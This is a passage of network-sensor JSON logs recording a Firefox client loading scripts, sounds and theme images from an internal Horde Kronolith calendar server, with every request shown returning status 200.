Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401},"app_proto":"http","fileinfo":{"filename":"\/js\/colorpicker.js","state":"CLOSED","stored":false,"size":12973,"tx_id":2}} 
{"timestamp":"2020-02-29T00:26:20.011607+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744}} {"timestamp":"2020-02-29T00:26:20.011912+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517}} {"timestamp":"2020-02-29T00:26:20.013306+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517},"app_proto":"http","fileinfo":{"filename":"\/js\/calendar.js","state":"CLOSED","stored":false,"size":10335,"tx_id":3}} 
{"timestamp":"2020-02-29T00:26:20.013612+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566}} {"timestamp":"2020-02-29T00:26:20.029529+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":24731,"tx_id":8}} {"timestamp":"2020-02-29T00:26:20.031054+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":27623},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/kronolith.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":9}} {"timestamp":"2020-02-29T00:26:20.036805+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/kronolith.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":50590}} {"timestamp":"2020-02-29T00:26:20.039089+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_ghost.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1566},"app_proto":"http","fileinfo":{"filename":"\/js\/form_ghost.js","state":"CLOSED","stored":false,"size":4231,"tx_id":4}} {"timestamp":"2020-02-29T00:26:20.039474+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168}} {"timestamp":"2020-02-29T00:26:20.040435+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/doorbell.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5168},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/doorbell.wav","state":"CLOSED","stored":false,"size":5168,"tx_id":5}} {"timestamp":"2020-02-29T00:26:20.040949+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688}} {"timestamp":"2020-02-29T00:26:20.042181+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363}} {"timestamp":"2020-02-29T00:26:20.043293+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/gnid3.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13688},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/gnid3.wav","state":"CLOSED","stored":false,"size":13688,"tx_id":6}} {"timestamp":"2020-02-29T00:26:20.043781+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744},"app_proto":"http","fileinfo":{"filename":"\/js\/sidebar.js","state":"CLOSED","stored":false,"size":1978,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.044683+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151}} {"timestamp":"2020-02-29T00:26:20.046209+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776}} {"timestamp":"2020-02-29T00:26:20.044629+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":10}} {"timestamp":"2020-02-29T00:26:20.076688+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256}} {"timestamp":"2020-02-29T00:26:20.077992+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/jetsndb.wav","state":"CLOSED","stored":false,"size":31256,"tx_id":11}} {"timestamp":"2020-02-29T00:26:20.078718+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107}} {"timestamp":"2020-02-29T00:26:20.077807+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/theetone.wav","state":"CLOSED","stored":false,"size":24776,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.078388+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:26:20.079100+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/reminder.wav","state":"CLOSED","stored":false,"size":23151,"tx_id":7}} {"timestamp":"2020-02-29T00:26:20.079595+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101}} {"timestamp":"2020-02-29T00:26:20.079716+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292}} {"timestamp":"2020-02-29T00:26:20.080724+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-split.png","state":"CLOSED","stored":false,"size":74,"tx_id":2}} {"timestamp":"2020-02-29T00:26:20.082215+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53156,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-active-bg.png","state":"CLOSED","stored":false,"size":101,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.082235+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282}} {"timestamp":"2020-02-29T00:26:20.082670+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/right.png","state":"CLOSED","stored":false,"size":282,"tx_id":3}} 
{"timestamp":"2020-02-29T00:26:20.082847+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:26:20.083414+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:26:20.083613+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/left.png","state":"CLOSED","stored":false,"size":292,"tx_id":8}} 
{"timestamp":"2020-02-29T00:26:20.083771+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53156,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/weekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.084509+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/monthview.png","state":"CLOSED","stored":false,"size":358,"tx_id":4}} {"timestamp":"2020-02-29T00:26:20.085673+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560}} {"timestamp":"2020-02-29T00:26:20.087589+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/buttonbar-bg.png","state":"CLOSED","stored":false,"size":107,"tx_id":12}} {"timestamp":"2020-02-29T00:26:20.086399+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:26:20.086773+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:26:20.087255+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/workweekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":9}} {"timestamp":"2020-02-29T00:26:20.088703+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/tasks.png","state":"CLOSED","stored":false,"size":614,"tx_id":5}} 
{"timestamp":"2020-02-29T00:26:20.125287+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301}} {"timestamp":"2020-02-29T00:26:20.129244+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:26:20.129190+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} 
